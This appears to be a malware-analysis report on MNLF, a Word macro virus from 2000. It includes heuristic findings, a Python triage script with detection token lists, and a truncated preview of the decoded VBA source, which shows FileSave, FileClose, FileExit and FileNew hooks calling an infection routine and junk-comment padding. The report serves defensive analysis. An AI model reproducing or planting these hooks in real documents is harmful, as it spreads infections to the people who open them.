Malware Insights
The sample is a legacy Word macro virus: the analyzer found both WordBasic-era markers and VBA macros, and the extracted module is named MNLF (Attribute VB_Name = "MNLF"). The critical OLE_VBA_SHELL heuristic reports a Shell() call in the VBA code, the usual way a macro runs arbitrary commands or launches a downloaded payload; the call lies outside the truncated preview shown below, so its argument is not visible here. The extracted artifact macros.bas contains several subroutines. AutoOpen is the classic entry point that runs when the document is opened. FileSave, FileClose, FileExit and FileNew carry the names of Word's built-in commands, so Word runs them in place of the real commands; the first three each set On Error Resume Next, call a routine named BMA, and only then perform the action the user asked for (save, close, quit). Calling the same routine before every save and close is the pattern of an infection routine that spreads through normal document use, although BMA itself is beyond the preview. A comment block just above FileSave reads "MNLF v1.0 8/26/2000" and dedicates the virus to Bangsamoro freedom fighters, which dates the sample to 2000 and marks it as hand-written historical malware rather than a modern loader. Nearly every line of source is followed by an identical junk comment built from a date, a user name and a printer path (HP LaserJet 2100 on \\OPANG), which nearly doubles the module's length and hides the short real logic when the source is skimmed, and (2 - 2) stands in for 0 (False) in the ActiveDocument.Saved check.
Heuristics (5)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS | OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. |
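To make the heuristics above and the behaviour described in the insights concrete, here is an added Python example that re-implements their logic with only the standard library. It is not the analyzer's code and not oletools; it goes slightly beyond the table by also flagging built-in command hooks (FileSave, FileClose, FileExit, FileNew) and the junk-comment padding seen in this sample. The rule ids starting with X_, the 0.3 padding threshold, the SAMPLE_VBA fragment and the SAMPLE_STREAM bytes are constructed for illustration; the other rule ids are the ones from the table.

```python
import re

# Auto-execution entry points. WordBasic (Word 6/95) and VBA share the Auto* names.
AUTO_EXEC_NAMES = {"autoopen", "autoexec", "autoclose", "autoexit", "autonew",
                   "document_open", "document_close", "document_new"}
# Word built-in commands that a macro of the same name silently replaces; the
# sample on this page hooks FileSave, FileClose, FileExit and FileNew this way.
BUILTIN_COMMANDS = {"filesave", "filesaveas", "fileclose", "fileexit", "filenew",
                    "fileopen", "toolsmacro", "filetemplates"}
# Strings the legacy-WordBasic and p-code heuristics look for in raw streams.
WORDBASIC_MARKERS = ("AutoOpen", "ToolsMacro", "MacroFile", "FileMacro", "GlobMacro", "MacroCopy")
RAW_AUTO_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "AutoNew")
RAW_EXEC_TOKENS = ("Shell", "CreateObject", "URLDownloadToFile", "MacroCopy")

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
SHELL_RE = re.compile(r'\bShell\b\s*(?:\(|"|\w)', re.I)  # Shell(...) or Shell "cmd", 0
COMMENT_PADDING_THRESHOLD = 0.3  # hypothetical: share of comment-only lines

def strip_comment(line):
    """Cut a trailing ' comment, ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def split_lines(src):
    """Return (code_lines, comment_only_lines); blank lines are dropped."""
    code, comments = [], []
    for raw in src.splitlines():
        line = raw.strip()
        if not line:
            continue
        stripped = strip_comment(line).strip()
        if stripped:
            code.append(stripped)
        else:
            comments.append(line)
    return code, comments

def triage_vba(src):
    """Apply the source-level heuristics; returns {rule_id: evidence}.
    Rule ids starting with X_ are this example's own, not the analyzer's."""
    code, comments = split_lines(src)
    procs = [m.group(1) for m in map(PROC_RE.match, code) if m]
    # Blank out string literals so a token inside quoted text is not counted as a call.
    no_str = [re.sub(r'"[^"]*"', '""', line) for line in code]
    findings = {}
    if procs:
        findings["OLE_VBA_MACROS"] = procs
    shell_hits = [line for line in no_str if SHELL_RE.search(line)]
    if shell_hits:
        findings["OLE_VBA_SHELL"] = shell_hits
    auto = [p for p in procs if p.lower() in AUTO_EXEC_NAMES]
    if auto:
        findings["OLE_VBA_AUTOOPEN"] = auto
    hooks = [p for p in procs if p.lower() in BUILTIN_COMMANDS]
    if hooks:
        findings["X_BUILTIN_COMMAND_HOOK"] = hooks
    total = len(code) + len(comments)
    ratio = round(len(comments) / total, 2) if total else 0.0
    if ratio >= COMMENT_PADDING_THRESHOLD:
        findings["X_COMMENT_PADDING"] = ratio
    return findings

def scan_raw_stream(data):
    """Token scan for streams where no VBA source can be extracted (p-code cache,
    Word 6/95 WordBasic). Tokens are checked as ASCII (case-insensitive) and UTF-16LE."""
    low = data.lower()
    def present(token):
        return token.encode("ascii").lower() in low or token.encode("utf-16-le") in data
    findings = {}
    markers = [m for m in WORDBASIC_MARKERS if present(m)]
    auto = any(present(t) for t in RAW_AUTO_TOKENS)
    if auto and any(m != "AutoOpen" for m in markers):
        findings["OLE_LEGACY_WORDBASIC_MACRO_VIRUS"] = markers
    exec_hits = [t for t in RAW_EXEC_TOKENS if present(t)]
    if auto and exec_hits:
        findings["OLE_VBA_PCODE_AUTOEXEC_EXEC"] = exec_hits
    return findings

# Constructed inputs modelled on the preview on this page; not the extracted macros.bas.
SAMPLE_VBA = """Attribute VB_Name = "MNLF"
Sub AutoOpen()
'LOVE6/30/00 1:40:18 PM junk comment
On Error Resume Next
'LOVE6/30/00 1:40:18 PM junk comment
Call BMA
'LOVE6/30/00 1:40:18 PM junk comment
End Sub
'LOVE6/30/00 1:40:18 PM junk comment
Sub FileSave()
'LOVE6/30/00 1:40:18 PM junk comment
Call BMA
'LOVE6/30/00 1:40:18 PM junk comment
ActiveDocument.Save
End Sub
Sub BMA()
If ActiveDocument.Saved = (2 - 2) Then ActiveDocument.Save
rc = Shell("cmd.exe /c echo stand-in", 0)  ' hypothetical payload line
End Sub
"""
SAMPLE_STREAM = (b"\x00\x02AutoOpen\x00\x05" + "ToolsMacro".encode("utf-16-le")
                 + b"\x00\x03Shell\x00")

if __name__ == "__main__":
    print(triage_vba(SAMPLE_VBA))
    print(scan_raw_stream(SAMPLE_STREAM))
```

On a real document, feed triage_vba the decoded source that olevba extracts (the macros.bas artifact above) and scan_raw_stream each raw OLE stream read with olefile; the raw scan is what still fires when source extraction fails or the macro is an old WordBasic form. Stripping comments first matters for this sample, since the padding comments carry dates and paths that would otherwise drown the dozen real lines.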
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55782 bytes | 8e5ada55d8ab8c2ecc2b20c696c8f711cd5ca01630ab87668524b1e3d221d7f1 | ClamAV: Win.Trojan.wmvg-1 | unlikely |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HNormal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MNLF"
Sub A3062000()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub B2000306()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub C6200030()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
'
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
'
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
' MNLF v1.0 8/26/2000
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
' This Virus is Created to acknowledge the effort of all bangsamoro
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
' freedom Fighter in there quest for independence... The struggle will
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
' continue
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub FileSave()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
On Error Resume Next
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Call BMA
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
ActiveDocument.Save
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub FileClose()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
On Error Resume Next
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Call BMA
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
If ActiveDocument.Saved = (2 - 2) Then ActiveDocument.Save
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
ActiveDocument.Close
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub FileExit()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
On Error Resume Next
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Call BMA
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
If ActiveDocument.Saved = (2 - 2) Then ActiveDocument.Save
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Application.Quit
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
End Sub
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Sub FileNew()
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
On Error Resume Next
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
Dialogs(wdDialogFileNew).Show
'LOVE6/30/00 1:40:18 PMOPEY A.HP LaserJet 2100 Series PCL 6 on \\OPANG\HP21006/30/00 1:40:18 PM
newfile$ = 1
'LOVE6/30/00 1:4 ... (truncated)
```